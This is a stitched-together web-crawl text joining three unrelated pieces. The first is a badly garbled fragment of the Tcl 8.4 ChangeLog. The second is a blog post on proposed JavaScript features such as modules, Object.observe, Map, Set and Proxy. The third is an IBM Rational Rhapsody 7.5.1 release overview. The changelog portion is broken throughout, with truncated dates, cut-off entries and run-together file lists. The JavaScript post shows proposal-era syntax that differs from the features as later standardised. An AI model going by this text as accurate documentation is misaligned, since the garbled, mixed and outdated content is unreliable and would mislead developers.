Fellows <[email protected]> * doc/CrtSlave.3 (Tcl_MakeSafe): Updated documentation to strongly discourage use. IMHO code outside the core that uses this function is a bug... [Bug 655300] 2003-07-16 Jeff Hobbs <[email protected]> * generic/tcl.h: Add recognition of -DTCL_UTF_MAX=6 on the * generic/regcustom.h: make/makefile.vc: Ditto. 
*-07-16 Don Porter <[email protected]> * generic/tclFileName.c (Tcl_GlobObjCmd): [Bug 771840] * generic/tclIOUtil: Added some examples from David Welton [Patch 763312]. * README: Bumped patch level to 8.4.4 in anticipation * generic/tcl.h: of another patch release. * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf (2.13) * win/configure: * generic/tclCompCmds.c (TclCompileIfCmd): Prior fix of Bug 711371 on 2003-04-07 introduced a buffer overflow. Corrected. [Bug 771613] 2003-07-15 Donal K. Fellows <[email protected]> * generic/tclCmdIL.c (SortCompare): Cleared up confusing error message. [Bug 771539] 2003-07-15 Daniel Steffen <[email protected]> *-23 Vince Darley <[email protected]> * generic/tclFCmd.c: fix to bad error message when trying to do 'file copy foo ""'. [Bug 756951] * tests/fCmd.test: added two new tests for the bug. *> * generic/tclCmdMZ.c: * tests/regexp.test: fixing of bugs related to regexp and regsub matching of empty strings. Addition of a number of new tests. 2003-06-10 Miguel Sofer <[email protected]> * generic/tclBasic.c: * generic/tclExecute.c: let TclEval Don Porter <[email protected]> * tests-22 Daniel Steffen <[email protected]> *** 8.4.3 TAGGED FOR RELEASE *** *-20 Jeff Hobbs <[email protected]> * changes: updated for 8.4.3 * unix/Makefile.in: do not run autoconf during 'make dist' as the configure is now a CVS-maintained file and should be up-to-date.. 2003-05-16 Daniel Steffen <[email protected]> * macosx/Tcl.pbproj/project.pbxproj: updated copyright year. 2003-05-15 Jeff Hobbs <[email protected]> * win/tclWinFile.c (TclpMatchInDirectory): revert glob code to r1.44 as 2003-04-14 optimizations broke Windows98 glob'ing. * README: bumped version to 8.4.3 * generic/tcl.h: * macosx/Tcl.pbproj/project.pbxproj: * tools/tcl.wse.in: * unix/configure: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure: * win/configure.in: *): Values which can't be anything but wide shouldn't be demoted to long. [consequence of HEAD fixes for] * generic/tclEnv.c (TclUnsetEnv): Another putenv() copy behavior problem repaired when compiling on windows and using microsoft's runtime. [Bug 736421] (gravereaux) 2003-05-13 Jeff Hobbs <[email protected]> * generic/tclIOUtil.c: add decl for FsThrExitProc to suppress warnings "id" * generic/tclDecls.h: Zoran Vasiljevic <[email protected]> * unix/tclUnixThrd.c: corrected [Bug 723502] 2003-05-10 Jeff Hobbs <[email protected]> * generic/tclIOUtil.c: ensure cd is thread-safe. [Bug 710642] (vasiljev-05 Don Porter <[email protected]> * grammar and spelling. 2003-04-29. (Bug has been around at least since Tcl 8.3.) * tests/fileName.test: added test for the above bug.> * generic/tclExecute.c (ExprCallMathFunc): remove incorrect extraneous cast from Tcl_WideAsDouble. 2003-04-18 Donal K. Fellows <[email protected]> * doc/open.n: Moved serial port options from [fconfigure] * doc/fconfigure.n:-15 Kevin Kenny <[email protected]> * win/tclWinTime.c: Corrected use of types to make compilation compatible with VC++5.> Merged various bug fixes from current cvs head: * tests/cmdAH.test: better fix to: Some re-arrangement of code to bring it closer to CVS HEAD. No functional changes. * tests/fCmd.test: * win/tclWinFile.c: added some filesystem optimisation to the 'glob' implementation, and some new tests. * tests/winFile.test: * tests/ioUtil.test: * tests/unixFCmd.test: renumbered tests with duplicate numbers. 
[Bug 710361] 2003-04-12 Kevin Kenny <[email protected]> * tests/clock.test:/tclObj.c (tclWideIntType, TclInitObjSubsystem): (SetBooleanFromAny): Make sure that tclWideIntType is defined and somewhat sensible everywhere. [Bug 713562]-01 Don Porter <[email protected]> * tests/README: Direct [source] of *.test files is no longer recommended. The tests/*.test files should only be evaluated under the control of the [runAllTests] command in tests/all.tcl. Don Porter <[email protected]> * doc/tcltest.n: * library/tcltest/tcltest.tcl: Added reporting during [configure -debug 1] operations to warn about multiple uses of the same test name. [FR 576693] Replaced [regexp] and [regsub] with [string map] where possible. Thanks to David Welton. [Bugs 667456,667558] * library/tcltest/pkgIndex.tcl: Bumped to tcltest 2.2.3 *, [Bugs 631741] (Chris Darroch) and [696893] (David Hilker).> * doc/Eval.3 (Tcl_EvalObjEx): Corrected CONST and * doc/ParseCmd.3 (Tcl_EvalTokensStandard): return type errors in documentation. [Bug 683994]-18 Vince Darley <[email protected]> * tests/cmdAH.test: fix test suite problem if /home is a symlink * generic/tclIOUtil.c: fix bad error message with 'cd ""' * win/tclWinFile.c: allow Tcl to differentiate between reparse points which are symlinks and mounted drives. These changes fix [Bugs 703264, 704917, 697862] respectively._FileObjCmd): Remove assumption that file times and longs are the same size. [Bug 698146] (Tcl_FormatObjCmd): Stop surprising type conversions from happening when working with integer and wide values. [Bug 699060] * Kevin Kenny <[email protected]> * win/makefile.vc: Backed the version to 8.4 on the 8.4 branch. (I just loathe sticky tags). 2003-03-12 Don Porter <[email protected]> *CmdMZ.c (Tcl_SubstObj): Corrected and added test for * tests/subst.test (subst-2.4): Tcl_SubstObj's incorrect halting of substitution at the first \x00 byte. [Bug 685106] *-08 Don Porter <[email protected]> * doc/tcltest.n: Added missing "-body" to example. Thanks to Helmut Giese. [Bug 700011] * tests/string.test: failing that it can't handle strings or * tests/stringComp.test: patterns with. Fixes [Bugs 655645, 615043,iler. 2002 ths * * generic/tcl.h: of CVS snapshots with the actual 8.4.0 * tools/tcl.wse.in: release. *] (sofer)] (lvirden)] (dgp) * doc/Concat.3: all remaining public interfaces of Tcl. * doc/CrtCommand.3: Notably, the parser no longer writes on * doc/CrtSlave.3: the string it is parsing, so it is no * doc/CrtTrace.3: longer necessary for Tcl_Eval() to be * doc/Eval.3: given a writable string. Also, the * doc/ExprLong.3: refactoring of the Tcl_*Var* routines * doc/LinkVar.3: by Miguel Sofer is included, so that the * doc/ParseCmd.3: "part1" argument for them no longer needs * doc/SetVar.3: to be writable either. * doc/TraceVar.3: * doc/UpVar.3: Compatibility support has been enhanced so * generic/tcl.decls: that a #define of USE_NON_CONST will remove * generic/tcl.h: all possible source incompatibilities with * generic/tclBasic.c: the 8.3 version of the header file(s). * generic/tclCmdMZ.c: The new #define of USE_COMPAT_CONST now does * generic/tclCompCmds.c:what USE_NON_CONST used to do -- disable * generic/tclCompExpr.c:only those new CONST's that introduce * generic/tclCompile.c: irreconcilable * tests/ioUtil.test: when the current directory is * tests/regexp.test: not writable... 
* tests/regexpComp.test: * tests/source.test: * tests/unixFile.test: * tests/unixNotfy.test: * tests/unixFCmd.test: Trying to make these test-files * tests/macFCmd.test: not bomb out with an error when * tests/http.test: the current directory is not * tests/fileName.test: writable... * * unix/tclUnixPipe.c: TclOS* because they are only used * unix/tclUnixFile.c: internally. Also stopped double-#def * unix/tclUnixFCmd.c: of TclOSlstat [Bug 566099,, [Bugs 493995, * unix/Makefile.in: when * tests/parseOld.test: and exports a [configure] command * tests/tcltest.test: from tcltest. 2002-06-22 Don Porter <[email protected]> * changes: updated changes file for 8.4b1 release. * library/tcltest/tcltest.tcl: Corrections to tcltest and the * tests/basic.test: Tcl test suite so that a test * tests/cmdInfo.test: with options -constraints knownBug * tests/compile.test: -limitConstraints 1 only tests the * tests/encoding.test: knownBug tests. Mostly involves * tests/env.test: replacing direct access to the * tests/event.test: testConstraints array with calls * tests/exec.test: to the testConstraint command * tests/execute.test: (which to * win/Makefile.in: match current Major.minor versions of the * win/makefile.bc: packages. Added tcltest package to * win/makefile.vc: mis-understanding. [Bug 536955] (dgp) *. [Bug. Fixes .sourceforge. Fixes " *** ******************************************************************
http://opensource.apple.com//source/tcl/tcl-97.1/tcl84/tcl/ChangeLog
CC-MAIN-2016-40
en
refinedweb
A Few New Things Coming To JavaScript November 22, 2012 Modules module Car { // import … // export … } A module instance is a module which has been evaluated, is linked to other modules or has lexically encapsulated data. An example of a module instance is: module myCar at "car.js"; module declarations can be used in the following contexts: module UniverseTest {}; module Universe { module MilkyWay {} }; module MilkyWay = 'Universe/MilkyWay'; module SolarSystem = Universe.MilkyWay.SolarSystem; module MySystem = SolarSystem; An export declaration declares that a local function or variable binding is visible externally to other modules. If you're familiar with the module pattern, think of this concept as being parallel to the idea of exposing functionality publicly. module Car { // Internal var licensePlateNo = '556-343'; // External export function drive(speed, direction) { console.log('details:', speed, direction); } export module engine { export function check() { } } export var miles = 5000; export var color = 'silver'; }; Modules import what they wish to use from other modules. Other modules may read the module exports (e.g. drive() and miles above) but they cannot modify them. Exports can be renamed as well so their names are different from local names. Revisiting the export example above, we can now selectively choose what we wish to import when in another module. We can just import drive(): import drive from Car; We can import drive() and miles: import {drive, miles} from Car; Earlier, we mentioned the concept of a Module Loader API. The module loader allows us to dynamically load in scripts for consumption. Similar to import, we are able to consume anything defined as an export from such modules. // Signature: load(moduleURL, callback, errorCallback) Loader.load('car.js', function(car) { console.log(car.drive(500, 'north')); }, function(err) { console.log('Error:' + err); }); load() accepts three arguments: moduleURL: The string representing a module URL (e.g. "car.js") callback: A callback function which receives the output result of attempting to load, compile and then execute the module errorCallback: A callback triggered if an error occurs during loading or compilation. What about classes? module widgets { // ... class DropDownButton extends Widget { constructor(attributes) { super(attributes); this.buildUI(); } buildUI() { this.domNode.onclick = function(){ // ... }; } } } Followed by today's de-sugared approach that ignores the semantic improvements brought by ES.next modules over the module pattern and instead emphasises our reliance on function variants: var widgets = (function(global) { // ... function DropDownButton(attributes) { Widget.call(this, attributes); this.buildUI(); } DropDownButton.prototype = Object.create(Widget.prototype, { constructor: { value: DropDownButton }, buildUI: { value: function(e) { this.domNode.onclick = function(e) { // ... } } } }); })(this); Where do these modules fit in with AMD? Use it today Object.observe() The idea behind Object.observe is that we gain the ability to observe and notify applications of changes made to specific JavaScript objects. Such changes include properties being added, updated, removed or reconfigured. // A model can be a simple object var todoModel = { label: 'Default', completed: false }; // Which we then observe Object.observe(todoModel, function(changes) { changes.forEach(function(change, i) { console.log(change); /* What property changed? change.name How did it change? 
change.type What's the current value? change.object[change.name] */ }); }); // Examples todoModel.label = 'Buy some more milk'; /* label changed It was changed by being updated Its current value is 'Buy some more milk' */ todoModel.completeBy = '01/01/2013'; /* completeBy changed It was changed by being new Its current value is '01/01/2013' */ delete todoModel.completed; /* completed changed It was changed by being deleted Its current value is undefined */ Availability: Object.observe will be available in Chrome Canary behind the "Enable Experimental JS APIs" flag. If you don't feel like getting that set up, you can also check out this video by Rafael Weinstein discussing the proposal. Use it today - Special build of Chromium - Watch.JS appears to offer similar behaviour, but isn't a polyfill or shim for Object.observe outright Read more (Rick Waldron). Default Parameter Values Default parameter values allow us to initialize parameters if they are not explicitly supplied. This means that we no longer have to write options = options || {};. The syntax is modified by allowing an (optional) initialiser after the parameter names: function addTodo(caption = 'Do something') { console.log(caption); } addTodo(); // Do something Only trailing parameters may have default values: function addTodo(caption, order = 4) {} function addTodo(caption = 'Do something', order = 4) {} function addTodo(caption, order = 10, other = this) {} Traceur demo Availability: FF18 Block Scoping Block scoping introduces new declaration forms for defining variables scoped to a single block. This includes: let: which syntactically is quite similar to var, but defines a variable in the current block, allowing function declarations in nested blocks const: like let, but is for read-only constant declarations. var x = 8; var y = 0; let (x = x+10, y = 12) { console.log(x+y); // 30 } console.log(x + y); // 8 let availability: FF18, Chrome 24+ const availability: FF18, Chrome 24+, SF6, WebKit, Opera 12 Maps and sets Maps: set(key, value): sets the value for the key in the map get(key): returns the value stored for the key has(key): a boolean check to test if a key exists delete(key): deletes the key specified from the map size(): returns the number of stored name-value pairs let m = new Map(); m.set('todo', 'todo'.length); // "todo" → 4 m.get('todo'); // 4 m.has('todo'); // true m.delete('todo'); // true m.has('todo'); // false Availability: FF18 Read more (Nicholas Zakas) Use it today Sets add(value) - adds the value to the set. delete(value) - removes the value from the set. has(value) - returns a boolean asserting whether the value has been added to the set let s = new Set([1, 2, 3]); // s has 1, 2 and 3. s.has(-Infinity); // false s.add(-Infinity); // s has 1, 2, 3, and -Infinity. s.has(-Infinity); // true s.delete(-Infinity); // true s.has(-Infinity); // false One possible use for sets is reducing the complexity of filtering operations. e.g: function unique(array) { var seen = new Set; return array.filter(function (item) { if (!seen.has(item)) { seen.add(item); return true; } }); } This results in O(n) for filtering uniques in an array. Almost all methods of array unique with objects are O(n^2) (credit goes to Brandon Benvie for this suggestion). Availability: Firefox 18, Chrome 24+ Read more (Nicholas Zakas) Use it today Proxies The Proxy API will allow us to create objects whose properties may be computed at run-time dynamically. It will also support hooking into other objects for tasks such as logging or auditing. 
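As a rough sketch of that logging use case (the settings object, its property names and the log format here are made-up illustrations, not part of the original article), a proxy can wrap an existing object and record every property read before forwarding it. This follows the older Proxy.create() form used in the next example, which was later superseded by the standard new Proxy(target, handler) syntax:

// Minimal logging-proxy sketch, assuming the older Proxy.create() API described in this article.
// Every property read on the proxy is logged, then the value from the wrapped object is returned.
var settings = { theme: 'dark', fontSize: 14 }; // hypothetical object to audit
var loggedSettings = Proxy.create({
  get: function(obj, propertyName) {
    console.log('read:', propertyName);
    return settings[propertyName]; // forward to the wrapped object
  }
});
loggedSettings.theme; // logs "read: theme" and yields 'dark'

The same idea works for auditing, since the wrapped object itself never needs to be modified.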
var obj = {foo: "bar"}; var proxyObj = Proxy.create({ get: function(obj, propertyName) { return 'Hey, '+ propertyName; } }); console.log(proxyObj.Alex); // "Hey, Alex" Also check out Zakas' Stack implementation using ES6 proxies experiment. Availability: FF18, Chrome 24 Read more (Nicholas Zakas) WeakMaps WeakMaps are similar to Maps, except that their keys must be objects rather than primitive values. let m = new WeakMap(); m.set('todo', 'todo'.length); // Exception! // TypeError: Invalid value used as weak map key m.has('todo'); // Exception! // TypeError: Invalid value used as weak map key let wmk = {}; m.set(wmk, 'thinger'); // wmk → 'thinger' m.get(wmk); // 'thinger' m.has(wmk); // true m.delete(wmk); // true m.has(wmk); // false So again, the main difference between WeakMaps and Maps is that WeakMaps are not enumerable. Use it today Read more (Nicholas Zakas) API improvements Object.is Object.is compares two values for equality, but unlike ===, it treats NaN as equal to NaN and distinguishes +0 from -0: Object.is(0, -0); // false Object.is(NaN, NaN); // true 0 === -0; // true NaN === NaN; // false Availability: Chrome 24+ Use it today Array.from Array.from: Converts a single argument that is an array-like object or list (e.g. arguments, NodeList, DOMTokenList (used by classList), NamedNodeMap (used by attributes property)) into a new Array() and returns it; Converting any Array-Like objects: Array.from({ 0: 'Buy some milk', 1: 'Go running', 2: 'Pick up birthday gifts', length: 3 }); The following examples illustrate common DOM use cases: var divs = document.querySelectorAll('div'); Array.from(divs); // [<div class="some classes" data-</div>, <div data-</div>] Array.from(divs).forEach(function(node) { console.log(node); }); Use it today Conclusions.
https://addyosmani.com/blog/a-few-new-things-coming-to-javascript/
CC-MAIN-2016-40
en
refinedweb
Overview Rational Rhapsody 7.5.1 The IBM® Rational® Rhapsody® 7.5.1 product release extends this development environment's systems engineering, software development, and testing capabilities with several new features and integrations that help improve the specification, design, development, documentation, and test of systems and products. Some of the new capabilities include: - Manage quality using integrations with the IBM® Rational® Quality Manager (RQM) solution and the IBM Rational Rhapsody TestConductor Add On - Develop automotive systems — from concept to code delivery — using AUTOSAR - Leverage the Systems Modeling Language (SysML) to clarify complex systems engineering projects - Integrate information and generate documentation from multiple tools using the IBM® Rational® Publishing Engine™ - Customize C++ code generation to meet your coding standards - Visually debug existing code more easily using animation - Improve local language use with the Japanese language version of the Rational Rhapsody environment These new features, plus other enhancements, helps systems engineers and software developers collaborate better, delivering high quality systems faster. Full test life cycle using the Rational Quality Manager and Rational TestConductor integration Quality assurance teams are often brought into the development lifecycle too late – after requirements are set and errors introduced into the design. To remedy this, IBM has integrated the Rational Rhapsody TestConductor and the IBM® Rational® Quality Manager solutions so that they create a live test plan that spans the entire product life cycle, providing a consolidated view from requirements to final product delivery. By bringing model-based tests into your overall testing suite, this integration helps you use the Rational Quality Manager solution to enhance your model-based testing inside a powerful generic framework. The integration works by using the Rational Quality Manager solution to manage different kinds of tests, test executions and tests results; the Rhapsody TestConductor tool uses the UML testing profile to automatically specify the test architectures and test cases, executing the tests to pinpoint design model failures. The Rational Quality Manager displays requirements, test cases, and other resources in one server-based document, helping geographically dispersed team members exchange information in realtime. The integration also helps enable risk-based testing, assisting QA teams as they prioritize testing of specific features and functions based on their importance in the overall project and likelihood or impact of failure. The ability to prioritize, combined with new reporting dashboards, offers product managers a more realistic view into product performance against set business objectives to better ensure that your project stays successfully on track. Figure 1: Manage Rational TestConductor tests with Rational Quality Manager Rational Publishing Engine integration You can extract information from the Rational Rhapsody model for publishing with the Rational Publishing Engine. The Rational Publishing Engine is an automated document generation solution designed to produce documentation from systems and software engineering data. Such documentation is often subject to complex style and format requirements imposed by internal standards groups, customers, suppliers, partners even government or industry regulatory bodies. 
The Rational Publishing Engine is optimized for ease of use and scalability, and can be used as another option for report generation in addition to Rational Rhapsody. The Rational Publishing Engine provides extractors to products, including:

- IBM® Rational® DOORS®
- IBM® Rational® Tau®
- IBM® Rational® ClearCase®
- IBM® Rational® ClearQuest®
- IBM® Rational® Quality Manager
- IBM® Rational® Focal Point™
- IBM® Rational® TestManager
- IBM® Rational® RequisitePro®
- IBM® Rational® Requirements Composer
- third party tools such as REST enabled and XML data sources

Figure 2: Rational Rhapsody information can be included in Rational Publishing Engine templates

Systems engineering improvements

Systems engineers are turning to the Object Management Group's (OMG) SysML language to specify their designs and analyze complex requirements, using a standard language to collaborate and deliver cohesive specifications. The Rational Rhapsody 7.5.1 solution provides refinements with SysML 1.1 that help improve the display of information on block definition diagrams, internal block diagrams and activity diagrams. In addition, systems engineers can take advantage of Eclipse support for the systems engineering editions of the Rational Rhapsody environment — which enables systems engineers to utilize the Rhapsody tool within the IBM® Rational® Team Concert environment.

Block definition diagram and internal block diagram improvements

You can now view attributes, operations, flow ports and ports inherited from super blocks on block definition and internal block diagrams and in the features dialog of the derived class. This is done through a check box in the display options dialog on diagrams, or in the features dialog of a block or class. This feature also works for UML.

Figure 3: Viewing attributes and operations of super blocks and classes

You can also use the display options operation to show compartments for association ends and parts on block definition diagrams, internal block diagrams or UML class diagrams.

Figure 4: Display compartments with association ends and parts

Improvements to the display of flow port information on diagrams are available in the Rational Rhapsody 7.5.1 solution through the display options operation. A new tab for flow ports is added to the features dialog of blocks.

Figure 5: Display flow port information in new tab

When using SysML with the Rhapsody 7.5.1 environment, by default when you drag a part onto another block that does not own it, a reference part is created with dashed lines. If you want to change the parent of the part, right click it and choose the reparent operation. This behavior is controlled by the property General:Graphics:AllowObjectReparenting. Setting this property to True will automatically reparent the part.

Figure 6: Reference properties appear as dashed lines

You can now display the ports of a class or a block on its internal block diagram frame.

Figure 7: Display ports on diagram frame

Activity diagram enhancements

Activity diagrams are improved in the Rational Rhapsody 7.5.1 tool: you can specify parts on activity diagram swimlanes so that they represent internal behavior, show parameters on activity diagram frames and display more information about pins.
Figure 8: Swimlanes and activity partitions representing parts

Figure 9: Activity parameters on diagram frame

Figure 10: Display options for pins

Callout notation for "allocation to" and "allocation from"

Representing allocation information in a comment is easy using the Rational Rhapsody 7.5.1 solution. Two new properties are created for SysML with Rhapsody for comments: Model:Comment:IsCallOut and Model:Comment:CallOutCompartments. After you draw the allocation relationships, create a comment. Set the property Model:Comment:IsCallOut of the comment to True. Draw an anchor to the source or target of the allocation and the comment will become a "callout" showing the allocated from / to relationship.

Figure 11: Display allocation information in comment

Parametric diagram binding connector alignment

The Rational Rhapsody 7.5.1 solution features improvements to the SysML binding connector capability on parametric diagrams so that you can set the compositional context of attributes. The context is set by a dialog box, invoked by right clicking on the attribute and selecting "Bind to context". In addition, three tags are added to the binding connector:

- SourceContext: the context of the source end of the binding connector
- TargetContext: the context of the target end of the binding connector
- Value: the value shared by the source and the target ends (both need to have the same value)

Figure 12: Binding attribute to a context

Systems engineering with Eclipse and Rational Team Concert

The IBM® Rational® Rhapsody® Designer for Systems Engineers and the IBM® Rational® Rhapsody® Architect for Systems Engineers tools are now supported within the Eclipse platform. A specialized modeling perspective for systems engineers is available to provide a SysML and UML modeling environment tailored for systems engineers. Working within the Eclipse environment helps enable systems engineers to take advantage of capabilities of Eclipse, such as being able to perform team collaboration using Rational Team Concert.

MODAF service views

The Ministry of Defence Architecture Framework (MODAF) support in the Rational Rhapsody DoDAF, MODAF and UPDM Add On solution is upgraded with the inclusion of service views, offering support for the MODAF 1.2 standard.

Embedded software development improvements

The Rational Rhapsody 7.5.1 solution helps improve support for software developers targeting embedded and real-time systems with customizable C++ code generation for better control over generated code. In addition, the tool provides more compliance with the MISRA C++ standard in generated code and framework, and improves animation of existing code to help validate it with minimal impact on the code. The latest refinements also improve synchronization of model and code information when roundtripping.

Visual debugging of existing code

Most development projects do not start from scratch, but attempt to use an existing code base. To effectively leverage this code base, it is important to understand how it works and validate that it works properly. This is a challenge if the code documentation has not been maintained. The Rational Rhapsody 7.5.1 product helps you meet this challenge by improving the animation of reverse engineered code, allowing you to add instrumentation for animation, validate the code and then remove the instrumentation to return to the original code.
This capability is enabled for C and C++ code by applying the "codecCentric" settings to the model, and it occurs automatically when reverse engineering code. You can enable animation from the configuration settings, or from the context menu of a sequence diagram.

Roundtripping improvements

The Rational Rhapsody 7.5.1 environment helps improve your ability to work in the model or code and to synchronize any changes you make in either view. You can now roundtrip the manually entered portion of a constructor's initializer for C++ code. Also, you are able to reorder the struct and union attributes in code and your model will maintain this order. Finally, you can add or remove namespaces in code, and the model is updated to reflect these changes when you use C++ with the code centric settings applied.

Generation of associations as references

Developers using C++ can specify that an association between two classes be implemented as a reference, instead of a pointer, to provide greater control over the generated application. A field is provided to specify the initial value of the reference.

Figure 13: Using references for associations

Code Generation Customization

The Rational Rhapsody 7.5.1 solution provides you with the ability to further customize C++ code generation to help deliver applications meeting corporate and industry mandated coding standards. The code generation process consists of two phases. The first phase is simplification, which transforms the model into a simpler version. The writing phase follows, which translates the simplified model into code. By modifying properties to control the output, some customization of code generation could always be done in the Rhapsody tool. To make this an easier process, hooks are now provided to create helpers using standard Rhapsody APIs that can manipulate the simplification phase to create a simplified model that translates into C++ code.

Figure 14: Define helpers to customize C++ code generation

AUTOSAR concept-to-code workflow

The IBM Rational Rhapsody 7.5.1 environment offers improved support for the AUTOSAR (AUTomotive Open System ARchitecture) standard by adding a transition from the AUTOSAR software architecture to the behavioral software designed using the Unified Modeling Language (UML) — generating C code for the entire software component that integrates with the AUTOSAR RTE. The Rhapsody solution helps enable a workflow where you can define and dynamically analyze your requirements in SysML so that they flow into the software architecture and behavior designed using UML. From here you can generate your production application C code, integrating it with the AUTOSAR RTE.

Figure 15: Model behavior targeting AUTOSAR

Improved MISRA C++ compliance

The Rational Rhapsody tool's code generation and framework are enhanced to support more guidelines recommended for MISRA C++, helping your teams create more reliable and safer code.

AUTOSAR authoring using Eclipse

The Rhapsody 7.5.1 environment helps enable teams using the AUTOSAR authoring profile to leverage the Eclipse platform integration for authoring, import and export of ARXML files.

New event implementation using MicroC profile

A new implementation for events is provided when using the MicroC profile that assists MISRA-C compliance of generated C code when you are working in the Rational Rhapsody Developer for C++, C and Java tool.
A single reference type, RiCEvent, is used for all generated events and also holds a reference to the event's data (if any exists); a dedicated type is generated only for events with data. The memory management for generated events in the generated code and for RiCEvent in the MicroC framework is changed so that it no longer uses the RiCMemoryManager. Instead, each event is allocated an RiCEvent from a dedicated, customizable, fixed size pool of RiCEvent reference types in the MicroC framework. If you are working with an event with data, an additional customizable, fixed size pool is generated to allocate the data part of the event.

Support active files with MicroC

The Rational Rhapsody 7.5.1 toolset extends the support of the Extended Execution Model used with the MicroC profile to include active files.

Framework Compilation for MicroC model

The Rational Rhapsody Developer for C tool helps optimize your application's build process using the MicroC framework by only compiling the framework if there were changes that require it, reducing the amount of time in the build process.

Improved hierarchical repository management

The Rhapsody solution is able to store model information in a flat or hierarchical fashion where each package in the model is represented as a directory in the file system. The Rhapsody tool helps improve synchronization of the model and configuration management repository when renaming, moving, or deleting a package, when specifying that a package is stored as a directory, or when converting a package stored as a directory back to the flat structure. When these operations occur, an appropriate action is performed in the configuration management repository to restructure it to reflect the Rational Rhapsody model. This capability is available when using Rational ClearCase or IBM® Rational® Synergy™ 7.1 (or later) and the MSSCCI 2.1 (or later) products. Synchronization is enabled with the properties RenameDirectoryActivation, MoveDirectoryActivation, DeleteDirectoryActivation, and StoreInSeparateDirectoryActivation under ConfigurationManagement:SCC.

Improvements for Ada development

The IBM® Rational® Rhapsody® in Ada™ tool includes new capabilities to model static classes, improvements to the reverse engineering of existing code, and custom makefile creation features to help you develop safety critical applications. A static class is an Ada package that contains only static attributes and operations, and this construct is supported for code generation, reverse engineering and animation. Existing Ada code bases can be visualized in the modeling environment using reverse engineering of the code while preserving the original source code, assisting your process with better design understanding and documentation. The code can be used within the Rhapsody model and compiled and linked into your Rhapsody project. Lastly, new features make it easier to create a new compiler environment with the ability to create new makefile templates to support the environment.

Improvements to the Rational Developer RulesComposer Add On

The Rational Developer RulesComposer Add On tool allows you to read models from IBM® Rational® Rose® MDL files, helping enable you to create a rule set that can transform a Rational Rose model. In addition, external file mapping rules are provided that allow you to edit all generated files in the Rational Rhapsody environment — even if the rule set customizes the filenames and project folder tree, creates more than two files per object to generate, or customizes the make and main files.
The Rhapsody meta model in the Rhapsody Developer RulesComposer tool is updated to include improvements on tag data stored in the model, such as:

- Multiplicity
- Value specification
- Literal specification
- Instance value

Enhancements to the Rhapsody family of products and complementary solutions

XMI customization and Rational Tau and Rational Statemate support

The IBM® Rational® Rhapsody® Developer RulesComposer Add On™ product now includes rule sets for XMI import and export features, helping you customize the import and export functions of your model information. XMI rule sets are included for the Rational Rhapsody, Rational Tau 4.3, and the IBM® Rational® Statemate® 4.6 solutions, helping enable you to customize the exchange of information between those tools or any other modeling tool that uses XMI. A Rational Rhapsody installation is required to launch the export and import functions from the Rational Tau or Rational Statemate solutions.

XMI support for SysML 1.1

The import and export of SysML 1.1 information is enhanced in the Rational Rhapsody 7.5.1 solution to help improve the exchange of behavioral flow ports, satisfy relationships and viewpoints, benefitting you with a more effective exchange of model information using SysML 1.1.

OMG Model Interchange Working Group (MIWG)

IBM is participating with other vendors in the OMG's Model Interchange Working Group to help improve the interoperability and exchange of model information between tools. The Rational Rhapsody solution's XMI support is validated at least through MIWG test case 2 with some validation into test case 3.

Partial import and export of XMI

Frequently, your project development team wants to exchange only a subset of a model. The XMI import and export capability now provides an option to import or export only a portion of the model information, offering more flexibility and scalability when exchanging model information.

Rational ClearCase Remote Client

Support is now provided for using the Rational ClearCase Remote Client when using the Eclipse platform integration of Rational Rhapsody, enabling developers leveraging the development capabilities provided with Eclipse to perform team collaboration with Rational ClearCase.

New help system

To provide a better user experience, the IBM Rational Rhapsody 7.5.1 solution now uses the IBM Rational help system. The help system provides a variety of ways to find the information you need. The table of contents is organized into task categories. Browse each category to see the hierarchy of general tasks and their supporting child tasks, or use the powerful search and index functions to browse information by keyword. While working in the product, you can access context-sensitive help by pressing F1. For more information about using the help system, open the help and search for "Help system overview".

Figure 16: The new help system is easier to navigate

Japanese version of the Rhapsody environment

The IBM Rational Rhapsody model-driven development solution is available in a Japanese version with a Japanese language interface, Japanese context sensitive help and Japanese documentation tools. Additionally, an integration with the IBM Rational Publishing Engine™ product allows generated documentation to contain Japanese characters. Multi-byte support is enabled by default to allow you to enter Japanese characters into the description and label fields of your Rhapsody model.
Multiple instances of Simulink block

The Rational Rhapsody toolset's interface with The MathWorks™ Simulink® environment is improved, allowing you to create multiple instances of the same Simulink block object within the Rational Rhapsody model so that you can simulate more complex architectures and controls.

Improved Rational SDL Suite interface

The interface to the IBM® Rational SDL Suite™ is improved with capabilities designed to help you model protocols and architecture together, including:

- Support for SDL Suite models containing SDL packages
- Import of user defined types (signal parameters)
- Support for by-pointer parameter (char*) data transfer
- Support for RPC (Remote Procedure Call)
- Support for SDL threaded integration models

Improved Rational System Architect interface

The Rational Rhapsody 7.5.1 solution offers an improved integration with the IBM® Rational® System Architect™ tool by enhancing the information import feature between the tools, so that it exchanges more information from high-level architecture modeling into the Rhapsody environment. New capabilities include:

- Import of all diagrams
- Import of multiple diagrams in one session
- Automatic creation and population of diagrams
- Import of all attributes
- Dynamic selection of import map
- Improved handling of duplicate elements
- Improved import wizard

Improved Siemens Teamcenter Integration

When you use the Siemens Teamcenter® product with the Rational Rhapsody environment, you can take advantage of improved support for import and export of more types, including:

- Dependencies without stereotypes
- Actions in activity diagrams and attributes of actions
- Action blocks along with sub-actions
- Object nodes in activity diagrams along with "State" attributes
- "ID" and "Specification" attributes of requirements
- Constraints along with "Specification" attributes of constraints
- Control flows and initial flows between actions in activity diagrams

The following items are only exported from the Rhapsody solution to the Teamcenter product:

- "Represents" attribute of object nodes in activity diagrams
- "Anchored Elements" attribute of constraints
- Swimlanes in activity diagrams from Rhapsody with "Represents" attributes

Wind River Workbench 3.1 support

The IBM® Rational® Rhapsody® Developer™ 7.5.1 solution offers support for the Wind River® Workbench 3.1 and Wind River VxWorks 6.7 products. In addition, support has been dropped for the Wind River Workbench 2.6 product.

Summary

The Rational Rhapsody 7.5.1 solution provides an integrated product development environment that helps you improve your systems engineering and embedded software designs, from initial requirement analysis to design implementation and test. You are able to manage quality as an integral part of the development process, helping development and test efforts work together with an integration between the Rational Rhapsody TestConductor and the IBM® Rational® Quality Manager products. Systems engineers are able to use improved SysML 1.1 capabilities to specify and manage designs more flexibly. Software developers can reuse and understand existing software, helping you deliver robust applications that meet safety standards and target automotive applications using improved AUTOSAR features. The Rational Rhapsody 7.5.1 solution provides an integrated systems engineering and embedded software delivery solution that helps facilitate team collaboration, promotes quality and maintains design information consistency.
IBM Rational Rhapsody packaging changes

